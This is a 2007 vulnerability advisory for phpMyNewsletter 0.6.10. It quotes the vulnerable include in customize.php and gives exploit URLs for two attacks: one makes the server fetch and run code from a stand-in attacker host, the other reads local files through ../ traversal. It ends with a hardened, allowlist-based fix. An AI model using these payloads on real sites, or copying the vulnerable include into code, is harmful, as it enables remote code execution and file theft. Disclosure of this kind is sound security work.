# Title : phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability
# Published : 2007-04-04
# Author : frog-m@n
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
¯¯¯¯¯¯¯¯¯¯
---- /include/customize.php ----
<?
$langfile = $l;
include $l;
?>
---- /include/customize.php ----
Exploit :
¯¯¯¯¯¯¯¯¯
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With http://[attacker]/code.txt containing :
<? echo $text; ?>
or
http://[target]/include/customize.php?l=../path/file/to/view
Patch :
¯¯¯¯¯¯¯
The author has been alerted and the latest version (0.7beta1) has been patched.
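For comparison with the two-line include above, one way to close both the remote and the local inclusion path (an added example, not the project's code and not the 0.7beta1 patch). The "lang" directory and the language names are assumptions made for illustration:

```php
<?php
// Added example: hardened replacement for the include in /include/customize.php.
// Assumption: language files sit in a "lang" directory next to this script and
// are named <code>.php. The directory name and the codes below are hypothetical.

const LANG_DIR      = __DIR__ . '/lang';
const DEFAULT_LANG  = 'english';
const ALLOWED_LANGS = ['english', 'francais'];

/**
 * Map an untrusted language selector to a file inside LANG_DIR.
 * The request value is only compared against the allowlist and never
 * concatenated into a path unless it matched, so URLs ("http://...") and
 * traversal sequences ("../") cannot reach include.
 */
function resolve_langfile($requested): string
{
    // Non-strings (e.g. ?l[]=x) and unknown codes fall back to the default.
    if (!is_string($requested) || !in_array($requested, ALLOWED_LANGS, true)) {
        $requested = DEFAULT_LANG;
    }
    return LANG_DIR . '/' . $requested . '.php';
}

// Read the selector explicitly from the query string. The original snippet
// uses $l without assigning it, i.e. it depends on register_globals.
$langfile = resolve_langfile($_GET['l'] ?? null);

if (is_file($langfile)) {
    include $langfile;
}

// Defence in depth, set in php.ini:
//   allow_url_include = Off
// This blocks the http:// case only. The ../path/file/to/view case is a local
// include and is stopped by the allowlist above, not by that setting.
```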
More details
- in French :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n